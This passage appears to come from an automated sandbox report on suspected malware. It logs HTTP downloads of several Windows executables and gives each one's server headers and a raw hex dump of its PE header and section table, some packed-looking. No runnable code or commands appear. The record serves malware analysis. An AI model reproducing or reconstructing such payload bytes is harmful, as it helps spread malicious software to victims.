00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:43 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 13:51:59 GMTETag: "1c9e00-6231a28b79a3f"Accept-Ranges: bytesContent-Length: 1875456Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 40 6b 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 6b 00 00 04 00 00 4b f9 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 
10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6c 62 79 78 62 65 6d 00 40 1a 00 00 f0 50 00 00 3a 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6e 64 77 63 70 6d 74 00 10 00 00 00 30 6b 00 00 06 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 6b 00 00 22 00 00 00 7c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:47 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 14:10:49 GMTETag: "1d6400-6231a6c1293ff"Accept-Ranges: bytesContent-Length: 1926144Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 24 6d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 37 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 37 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 
02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6d 6a 63 78 68 6d 77 00 50 1a 00 00 f0 31 00 00 4a 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 71 73 69 64 68 77 65 00 10 00 00 00 40 4c 00 00 04 00 00 00 3e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 42 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:51 GMTContent-Type: application/octet-streamContent-Length: 3643904Last-Modified: Thu, 26 Sep 2024 19:28:15 GMTConnection: keep-aliveETag: "66f5b5cf-379a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 80 02 85 16 00 00 00 00 00 00 00 00 f0 00 02 01 0b 02 08 00 00 5c 23 00 00 3c 14 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 23 00 ac 3a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 5b 23 00 00 20 00 00 00 5c 23 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 3a 14 00 00 80 23 00 00 3c 14 00 00 5e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 58 e5 22 00 54 96 00 00 00 00 02 00 4e 00 00 06 a4 b7 00 00 b2 2d 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 7e 19 bc 80 fc 50 74 80 66 ad 9d 4c 5e 5b 31 e4 77 a8 75 91 fd a0 ce d2 95 17 42 5a c5 46 14 82 e4 aa 21 9b ea df fa 2d 0e 28 9b 04 83 45 11 e2 21 6c 04 7c c1 49 c9 dd 49 e8 ea e5 0d 19 b9 1f 98 1b 66 b2 39 94 f9 96 ac 48 83 d4 04 ca 4f 4f 05 5f 39 58 42 96 c0 9b e0 43 52 01 f4 15 1f f3 6e 7c 6b 68 de 5e a9 8b 72 6c cf 79 c5 f3 d8 7e 99 9a df ad df 60 db 02 5a ca d0 f4 42 f8 a0 97 28 8e 65 87 5f e6 70 a6 b4 ac e5 d4 c6 46 d5 eb 6a d3 67 5a 34 70 13 0e 9f 68 0d 14 8c b3 48 79 ca 37 50 36 8d 51 1e b1 29 39 f7 32 79 07 3a 13 f3 e4 8a 6e 90 46 62 b7 7a 57 e6 f5 d8 5c 19 01 63 6c 09 8e f5 9e 5d 18 b4 b4 31 f9 77 e0 93 98 2d f9 1f a7 28 d9 e7 84 d4 97 ba 36 69 28 d7 cb 20 f6 ce 0d fc ab 1d 55 86 72 b9 db 14 67 40 99 c2 4e c7 de 3d 71 d8 89 83 83 b8 5d e2 27 ad 8b db 64 d9 80 12 86 9a 81 db c8 20 b5 1f 0b 70 6c 57 21 72 1b 5f f8 8e ad 1d 44 88 78 f1 be 71 5f c3 2d fe af 8d bf 87 3c b2 46 03 73 51 23 69 78 13 4c 06 c1 b3 92 2b e2 d5 2c 62 cc fd 22 8e 1c 57 c0 f1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
